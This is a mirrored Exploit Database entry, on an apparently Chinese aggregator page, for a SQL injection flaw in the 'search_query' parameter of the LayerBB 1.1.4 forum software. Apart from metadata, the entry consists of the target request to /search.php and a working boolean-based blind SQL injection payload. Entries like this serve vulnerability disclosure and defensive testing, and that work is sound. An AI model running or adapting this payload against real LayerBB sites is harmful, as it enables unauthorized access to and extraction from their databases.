LayerBB 1.1.4 – ‘search_query’ SQL Injection

• Exploit Database
• 17 阅读

• 作者： Görkem Haşin
  日期： 2021-02-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49593/

• # Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection
  # Date: 2021-02-19
  # Exploit Author: Görkem Haşin
  # Version: 1.1.4
  # Tested on: Linux/Windows
  
  # POST /search.php HTTP/1.1
  # Host: Target
  
  Payload: search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search